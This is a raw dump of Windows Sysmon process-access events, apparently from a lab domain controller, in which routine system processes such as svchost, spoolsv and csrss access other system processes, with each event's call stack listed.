12:02:11.933{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.918{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\system32\TSTheme.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.918{266CAFBE-646C-6064-1000-00000000AE01}11242344C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\system32\TSTheme.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.918{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\system32\TSTheme.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.918{266CAFBE-647C-6064-2B00-00000000AE01}25362900C:\Windows\System32\spoolsv.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\spoolsv.exe+1b0d3|C:\Windows\System32\spoolsv.exe+1af39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bfb|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 